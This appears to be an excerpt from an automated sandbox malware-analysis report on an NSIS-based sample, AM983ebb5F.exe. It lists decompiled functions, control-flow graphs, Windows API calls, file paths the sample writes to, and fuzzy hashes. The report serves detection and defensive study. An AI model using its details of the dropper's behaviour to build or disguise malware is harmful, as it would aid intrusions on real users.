                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                    • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$antholite
                                                                                    • API String ID: 4024019347-2831730964
                                                                                    • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                    • Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
                                                                                    • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                    • Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E
                                                                                    Function 004032B9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 573 4032b9-4032d0 574 4032d2 573->574 575 4032d9-4032e2 573->575 574->575 576 4032e4 575->576 577 4032eb-4032f0 575->577 576->577 578 403300-40330d call 4034d4 577->578 579 4032f2-4032fb call 4034ea 577->579 583 4034c2 578->583 584 403313-403317 578->584 579->578 585 4034c4-4034c5 583->585 586 40346d-40346f 584->586 587 40331d-403366 GetTickCount 584->587 590 4034cd-4034d1 585->590 588 403471-403474 586->588 589 4034af-4034b2 586->589 591 4034ca 587->591 592 40336c-403374 587->592 588->591 595 403476 588->595 593 4034b4 589->593 594 4034b7-4034c0 call 4034d4 589->594 591->590 596 403376 592->596 597 403379-403387 call 4034d4 592->597 593->594 594->583 607 4034c7 594->607 600 403479-40347f 595->600 596->597 597->583 606 40338d-403396 597->606 603 403481 600->603 604 403483-403491 call 4034d4 600->604 603->604 604->583 610 403493-40349f call 4060f9 604->610 609 40339c-4033bc call 406aa6 606->609 607->591 615 4033c2-4033d5 GetTickCount 609->615 616 403465-403467 609->616 617 4034a1-4034ab 610->617 618 403469-40346b 610->618 619 403420-403422 615->619 620 4033d7-4033df 615->620 616->585 617->600 621 4034ad 617->621 618->585 624 403424-403428 619->624 625 403459-40345d 619->625 622 4033e1-4033e5 620->622 623 4033e7-403418 MulDiv wsprintfW call 4055dc 620->623 621->591 622->619 622->623 632 40341d 623->632 628 40342a-403431 call 4060f9 624->628 629 40343f-40344a 624->629 625->592 626 403463 625->626 626->591 633 403436-403438 628->633 631 40344d-403451 629->631 631->609 634 403457 631->634 632->619 633->618 635 40343a-40343d 633->635 634->591 635->631
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountTick$wsprintf
                                                                                    • String ID: *B$ FB$ A$ A$... %d%%
                                                                                    • API String ID: 551687249-3833040932
                                                                                    • Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                    • Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
                                                                                    • Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                    • Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99
                                                                                    Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 636 401774-401799 call 402dab call 405e9d 641 4017a3-4017b5 call 406557 call 405e26 lstrcatW 636->641 642 40179b-4017a1 call 406557 636->642 647 4017ba-4017bb call 406805 641->647 642->647 651 4017c0-4017c4 647->651 652 4017c6-4017d0 call 4068b4 651->652 653 4017f7-4017fa 651->653 661 4017e2-4017f4 652->661 662 4017d2-4017e0 CompareFileTime 652->662 655 401802-40181e call 406047 653->655 656 4017fc-4017fd call 406022 653->656 663 401820-401823 655->663 664 401892-4018bb call 4055dc call 4032b9 655->664 656->655 661->653 662->661 665 401874-40187e call 4055dc 663->665 666 401825-401863 call 406557 * 2 call 406594 call 406557 call 405bb7 663->666 678 4018c3-4018cf SetFileTime 664->678 679 4018bd-4018c1 664->679 676 401887-40188d 665->676 666->651 698 401869-40186a 666->698 680 402c38 676->680 682 4018d5-4018e0 CloseHandle 678->682 679->678 679->682 686 402c3a-402c3e 680->686 683 4018e6-4018e9 682->683 684 402c2f-402c32 682->684 687 4018eb-4018fc call 406594 lstrcatW 683->687 688 4018fe-401901 call 406594 683->688 684->680 694 401906-4023a7 call 405bb7 687->694 688->694 694->684 694->686 698->676 700 40186c-40186d 698->700 700->665
                                                                                    APIs
                                                                                    • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\erstatningsgraden,?,?,00000031), ref: 004017B5
                                                                                    • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\erstatningsgraden,?,?,00000031), ref: 004017DA
                                                                                      • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                      • Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,74DF23A0), ref: 00405637
                                                                                      • Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsuD53D.tmp$C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\erstatningsgraden$ExecToStack
                                                                                    • API String ID: 1941528284-765737209
                                                                                    • Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                    • Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
                                                                                    • Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                    • Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D
                                                                                    Function 004055DC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 702 4055dc-4055f1 703 4055f7-405608 702->703 704 4056a8-4056ac 702->704 705 405613-40561f lstrlenW 703->705 706 40560a-40560e call 406594 703->706 708 405621-405631 lstrlenW 705->708 709 40563c-405640 705->709 706->705 708->704 710 405633-405637 lstrcatW 708->710 711 405642-405649 SetWindowTextW 709->711 712 40564f-405653 709->712 710->709 711->712 713 405655-405697 SendMessageW * 3 712->713 714 405699-40569b 712->714 713->714 714->704 715 40569d-4056a0 714->715 715->704
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                    • lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                    • lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,74DF23A0), ref: 00405637
                                                                                    • SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                    • String ID: antholite
                                                                                    • API String ID: 2531174081-3488562018
                                                                                    • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                    • Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
                                                                                    • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                    • Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8
                                                                                    Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 716 4068db-4068fb GetSystemDirectoryW 717 4068fd 716->717 718 4068ff-406901 716->718 717->718 719 406912-406914 718->719 720 406903-40690c 718->720 722 406915-406948 wsprintfW LoadLibraryExW 719->722 720->719 721 40690e-406910 720->721 721->722
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                    • wsprintfW.USER32 ref: 0040692D
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                    • String ID: %s%S.dll$UXTHEME
                                                                                    • API String ID: 2200240437-1106614640
                                                                                    • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                    • Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
                                                                                    • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                    • Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8
                                                                                    Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 723 406076-406082 724 406083-4060b7 GetTickCount GetTempFileNameW 723->724 725 4060c6-4060c8 724->725 726 4060b9-4060bb 724->726 727 4060c0-4060c3 725->727 726->724 728 4060bd 726->728 728->727
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00406094
                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountFileNameTempTick
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                    • API String ID: 1716503409-678247507
                                                                                    • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                    • Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
                                                                                    • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                    • Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768
                                                                                    Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 729 4015c6-4015da call 402dab call 405ed1 734 401636-401639 729->734 735 4015dc-4015ef call 405e53 729->735 737 401668-4022fb call 401423 734->737 738 40163b-40165a call 401423 call 406557 SetCurrentDirectoryW 734->738 742 4015f1-4015f4 735->742 743 401609-40160c call 405b05 735->743 753 402c2f-402c3e 737->753 738->753 755 401660-401663 738->755 742->743 746 4015f6-4015fd call 405b22 742->746 752 401611-401613 743->752 746->743 759 4015ff-401602 call 405aab 746->759 756 401615-40161a 752->756 757 40162c-401634 752->757 755->753 760 401629 756->760 761 40161c-401627 GetFileAttributesW 756->761 757->734 757->735 764 401607 759->764 760->757 761->757 761->760 764->752
                                                                                    APIs
                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405EDF
                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                      • Part of subcall function 00405AAB: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AED
                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\erstatningsgraden,?,00000000,000000F0), ref: 00401652
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 00401645
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                    • String ID: C:\Users\user\AppData\Roaming\erstatningsgraden
                                                                                    • API String ID: 1892508949-1967000036
                                                                                    • Opcode ID: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
                                                                                    • Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
                                                                                    • Opcode Fuzzy Hash: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
                                                                                    • Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E
                                                                                    Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 769 4020dd-4020e9 770 4021a8-4021aa 769->770 771 4020ef-402105 call 402dab * 2 769->771 772 4022f6-4022fb call 401423 770->772 780 402115-402124 LoadLibraryExW 771->780 781 402107-402113 GetModuleHandleW 771->781 779 402c2f-402c3e 772->779 783 402126-402135 call 4069ba 780->783 784 4021a1-4021a3 780->784 781->780 781->783 788 402170-402175 call 4055dc 783->788 789 402137-40213d 783->789 784->772 793 40217a-40217d 788->793 791 402156-40216e 789->791 792 40213f-40214b call 401423 789->792 791->793 792->793 802 40214d-402154 792->802 793->779 795 402183-40218d call 403bc9 793->795 795->779 801 402193-40219c FreeLibrary 795->801 801->779 802->793
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                      • Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,74DF23A0), ref: 00405637
                                                                                      • Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                                                                    • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 334405425-0
                                                                                    • Opcode ID: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
                                                                                    • Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
                                                                                    • Opcode Fuzzy Hash: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
                                                                                    • Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D
                                                                                    Function 0040252F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
